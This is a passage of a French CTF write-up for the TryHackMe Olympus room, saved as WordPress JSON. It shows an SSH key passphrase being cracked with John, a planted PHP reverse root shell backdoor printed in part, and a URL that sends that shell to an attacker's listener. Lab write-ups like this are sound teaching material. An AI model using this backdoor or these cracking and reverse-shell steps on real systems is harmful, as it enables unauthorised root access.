class=\"tadv-color\">Zeus<\/span><\/strong> vers un autre fichier :<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"608\" height=\"269\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-18.png\" alt=\"\" class=\"wp-image-2462\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-18.png 608w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-18-300x133.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-18-150x66.png 150w\" sizes=\"auto, (max-width: 608px) 100vw, 608px\" \/><\/figure>\n<\/div>\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous devons donc r\u00e9cup\u00e9rer cette cl\u00e9 afin de se connecter \u00e0 l&rsquo;utilisateur <span style=\"color:#cf2e2e\" class=\"tadv-color\"><strong>Zeus<\/strong><\/span> via <a href=\"https:\/\/mikadmin.fr\/blog\/how-to-change-the-default-ssh-port\/\" target=\"_blank\" rel=\"noopener\">SSH<\/a> :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"\" data-line=\"\">chmod 400 id_rsa\nssh -i id_rsa zeus@olympus.thm\n<\/code><\/pre>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Mais la cl\u00e9 est prot\u00e9g\u00e9e par une <strong>passphrase<\/strong> que nous allons devoir trouver \u00e0 l&rsquo;aide de notre ami <strong><span style=\"color:#fcb900\" class=\"tadv-color\">John<\/span><\/strong> :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"\" data-line=\"\">\/usr\/share\/john\/ssh2john.py id_rsa &gt; pass\njohn pass --wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">On peut donc nous connecter en utilisant la <strong>passphrase<\/strong> :<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"206\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-19.png\" alt=\"\" class=\"wp-image-2467\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-19.png 560w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-19-300x110.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-19-150x55.png 150w\" sizes=\"auto, (max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"has-text-align-center has-x-large-font-size wp-block-heading\" id=\"aioseo-privesc\">[PrivESC]<\/h2>\n\n\n\n<div style=\"height:34px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Apr\u00e8s \u00e9num\u00e9ration des users et groupes own par <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">Zeus<\/span><\/strong>, nous obtenons :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"\" data-line=\"\">find \/ -group zeus -print 2&gt;\/dev\/null<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"535\" height=\"271\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-20.png\" alt=\"\" class=\"wp-image-2470\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-20.png 535w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-20-300x152.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-20-150x76.png 150w\" sizes=\"auto, (max-width: 535px) 100vw, 535px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Le contenu du fichier <strong>php<\/strong> semble fortement indiquer que <span style=\"color:#0693e3\" class=\"tadv-color\"><strong>Prometheus<\/strong> <\/span>a mis en place une <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">backdoor<\/span><\/strong> :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-php\" data-line=\"\">&lt;?php\n$pass = &quot;a7c5ffcf139742f52a5267c4a0674129&quot;;\nif(!isset($_POST[&quot;password&quot;]) || $_POST[&quot;password&quot;] != $pass) die(&#039;&lt;form name=&quot;auth&quot; method=&quot;POST&quot;&gt;Password: &lt;input type=&quot;password&quot; name=&quot;password&quot; \/&gt;&lt;\/form&gt;&#039;);\n\nset_time_limit(0);\n\n$host = htmlspecialchars(&quot;$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]&quot;, ENT_QUOTES, &quot;UTF-8&quot;);\nif(!isset($_GET[&quot;ip&quot;]) || !isset($_GET[&quot;port&quot;])) die(&quot;&lt;h2&gt;&lt;i&gt;snodew reverse root shell backdoor&lt;\/i&gt;&lt;\/h2&gt;&lt;h3&gt;Usage:&lt;\/h3&gt;Locally: nc -vlp [port]&lt;\/br&gt;Remote: $host?ip=[destination of listener]&amp;port=[listening port]&quot;);\n$ip = $_GET[&quot;ip&quot;]; $port = $_GET[&quot;port&quot;];\n\n$write_a = null;\n$error_a = null;\n\n$suid_bd = &quot;\/lib\/defended\/libc.so.99&quot;;\n$shell = &quot;uname -a; w; $suid_bd&quot;;\n\n[REDACTED]\n?&gt;<\/code><\/pre>\n\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous acc\u00e9dons \u00e0 cette interface sur l&rsquo;adresse suivante en sp\u00e9cifiant l&rsquo;<strong>adresse IP de la machine<\/strong> car le fichier index.php est le fichier qui redirige vers <strong><span style=\"color:#0693e3\" class=\"tadv-color\">http:\/\/olympus.thm<\/span><\/strong> : <\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-markup\" data-line=\"\">http:\/\/10.10.5.206\/0aB44fdS3eDnLkpsz3deGv8TttR4sc\/VIGQFQFMYOST.php<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Afin d&rsquo;obtenir un <strong>shell<\/strong> nous rentrons donc le password pr\u00e9sent dans le fichier <strong>php<\/strong> et activons notre reverse shell.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"163\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-21-1024x163.png\" alt=\"\" class=\"wp-image-2476\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-21-1024x163.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-21-300x48.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-21-150x24.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-21-768x123.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-21.png 1172w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-php\" data-line=\"\">http:\/\/10.10.5.206\/0aB44fdS3eDnLkpsz3deGv8TttR4sc\/VIGQFQFMYOST.php?ip=YOUR_IP&amp;port=YOUR_PORT<\/code><\/pre>\n\n\n\n<div style=\"height:28px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Et bingo nous obtenons donc un shell en tant que <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">root<\/span><\/strong> :<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"631\" height=\"254\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-22.png\" alt=\"\" class=\"wp-image-2477\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-22.png 631w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-22-300x121.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-22-150x60.png 150w\" sizes=\"auto, (max-width: 631px) 100vw, 631px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"has-text-align-center has-x-large-font-size wp-block-heading\" id=\"aioseo-bonus\">[BONUS]<\/h2>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Il nous reste donc \u00e0 pr\u00e9sent \u00e0 trouver le dernier flag qui est pr\u00e9sent dans <strong>\/etc<\/strong> et l&rsquo;avantage est que nous connaissons d\u00e9j\u00e0 le format du flag qui est <strong><span style=\"color:#9b51e0\" class=\"tadv-color\">\u00ab\u00a0FLAG{\u00ab\u00a0<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">grep -rni &quot;flag{&quot; \/etc\/<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"483\" height=\"140\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-23.png\" alt=\"\" class=\"wp-image-2478\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-23.png 483w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-23-300x87.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-23-150x43.png 150w\" sizes=\"auto, (max-width: 483px) 100vw, 483px\" \/><\/figure>\n<\/div>\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p><span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 6<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span>TryHackMe &#8211; Olympus Room designed by G4vr0ch3. <a href=\"https:\/\/mikadmin.fr\/blog\/tryhackme-olympus\/\" class=\"more-link\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":2536,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4,3],"tags":[21,80,9,82,78,22,63],"class_list":["post-2412","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","category-system","tag-ctf","tag-file-upload","tag-linux","tag-php","tag-sqli","tag-tryhackme","tag-writeup"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/2412","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=2412"}],"version-history":[{"count":1,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/2412\/revisions"}],"predecessor-version":[{"id":3131,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/2412\/revisions\/3131"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/2536"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=2412"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=2412"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=2412"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}